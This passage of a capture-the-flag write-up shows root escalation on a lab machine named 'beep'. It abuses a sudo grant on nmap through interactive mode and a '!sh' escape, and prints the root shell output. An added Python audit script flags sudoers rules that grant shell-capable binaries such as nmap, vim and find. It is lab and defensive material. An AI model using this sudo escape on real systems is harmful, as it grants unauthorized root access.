Nmap
While there are so many different ways to escalate privileges to the root user, I will go with one of the simple ways that abuses the current user's sudo privileges. I found out earlier that the asterisk user is able to execute /usr/bin/nmap as the root user.

According to GTFOBins, Nmap can be used to elevate privileges if configured to run as superuser.
bash-3.2$ sudo -u root /usr/bin/nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap>

Following through:
nmap> !sh
sh-3.2# whoami
root
sh-3.2# hostname
beep
sh-3.2# /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:B9:54:75
          inet addr:10.10.10.7  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4668 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3917 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1251095 (1.1 MiB)  TX bytes:924455 (902.7 KiB)
          Interrupt:59 Base address:0x2024

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2469 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2469 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:331864 (324.0 KiB)  TX bytes:331864 (324.0 KiB)
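A defender-side check for the misconfiguration abused above, written as an added example that is not part of the original write-up: it parses sudoers user specifications and flags non-root users who may run, as root, either ALL or a binary GTFOBins lists as shell-capable (/usr/bin/nmap among them). The sample sudoers content is constructed; the exact syntax of the asterisk/beep rule is an assumption based on the sudo finding described on this page.

```python
import re
from typing import Dict, List

# Subset of the binaries GTFOBins lists as able to run arbitrary commands when sudo runs them as root.
SHELL_CAPABLE = {"/usr/bin/nmap", "/usr/bin/vim", "/usr/bin/vi", "/usr/bin/less", "/usr/bin/more",
                 "/usr/bin/find", "/usr/bin/awk", "/usr/bin/perl", "/usr/bin/python", "/bin/bash", "/bin/sh"}

# Constructed sudoers content: the asterisk/beep rule mirrors the grant the write-up abuses (syntax assumed).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    requiretty
root    ALL=(ALL)       ALL
asterisk beep = (root) NOPASSWD: /usr/bin/nmap, /usr/bin/chkconfig
backup  ALL = (root) /usr/bin/rsync
"""

# user  host = (runas[:group]) [NOPASSWD:] cmd, cmd, ...
_RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
                   r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def parse_sudoers(text: str) -> List[Dict[str, object]]:
    """Parse user-specification lines; comments, Defaults and blank lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        rules.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": (m.group("runas") or "root").split(":")[0].strip(),  # default runas is root
            "nopasswd": "NOPASSWD:" in cmds,
            "cmds": [c.strip() for c in cmds.replace("NOPASSWD:", "").replace("PASSWD:", "").split(",")
                     if c.strip()],
        })
    return rules

def risky_rules(text: str) -> List[str]:
    """Report non-root users granted ALL, or a shell-capable binary, to run as root."""
    findings = []
    for r in parse_sudoers(text):
        if r["user"] == "root" or r["runas"] not in ("root", "ALL"):
            continue
        for cmd in r["cmds"]:
            if cmd == "ALL" or cmd.split()[0] in SHELL_CAPABLE:
                tag = " (NOPASSWD)" if r["nopasswd"] else ""
                findings.append(f"{r['user']} -> {r['runas']}: {cmd}{tag}")
    return findings
```

Nmap dropped --interactive (and with it the !sh escape) in later releases, but the binary stays on the list because the sudo grant itself is the finding. For a real audit, feed the contents of /etc/sudoers and /etc/sudoers.d/* to risky_rules().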
System Level Compromise